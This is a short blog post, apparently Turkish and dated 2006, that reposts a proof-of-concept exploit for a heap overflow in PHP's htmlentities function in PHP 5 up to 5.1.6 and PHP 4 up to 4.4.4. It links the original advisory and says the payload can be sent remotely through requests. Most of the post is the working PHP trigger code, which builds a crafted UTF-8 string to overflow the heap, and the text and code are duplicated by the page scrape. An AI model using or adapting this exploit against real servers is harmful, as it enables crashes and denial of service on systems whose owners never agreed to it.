PoC / Exploit for PHP HTML Entity Encoder Heap Overflow Vulnerability - Crash/DoS?
Günlük Okunma : 12 | 07.11.2006
I like Proof of Concepts, so this is a simple PoC for PHP HTML Entity Encoder Heap Overflow Vulnerability. You can supply payload from requets so it's remote. Original Advisory : http://www.securityfocus.com/archive/1/450431<?// PHP 5 <= 5.1.6, PHP 4 <= 4.4.4 $fuzzFixed=""; echo "something... we need this stupid echo or do something else..."; for($pl=0; $pl<64; $pl++) $fuzzFixed .= code2utf(977); htmlentities($fuzzFixed , ENT_NOQUOTES, "utf-8" ); function code2utf($num){ return chr(($num>>6)+192).chr(($num&63)+128); } echo "ehm...";......
I like Proof of Concepts, so this is a simple PoC for PHP HTML Entity Encoder Heap Overflow Vulnerability. You can supply payload from requets so it's remote. Original Advisory : http://www.securityfocus.com/archive/1/450431<?// PHP 5 <= 5.1.6, PHP 4 <= 4.4.4 $fuzzFixed=""; echo "something... we need this stupid echo or do something else..."; for($pl=0; $pl<64; $pl++) $fuzzFixed .= code2utf(977); htmlentities($fuzzFixed , ENT_NOQUOTES, "utf-8" ); function code2utf($num){ return chr(($num>>6)+192).chr(($num&63)+128); } echo "ehm...";......
Arşiv
Yeni yazıları RSS ile takip edebilir ya da e-mail adresinize gelmesini sağlayabilirsiniz.
En Çok Okunan 10 Yazı | Toplam En Çok Okunan 10 Yazı | Tüm yazılar ve Makaleler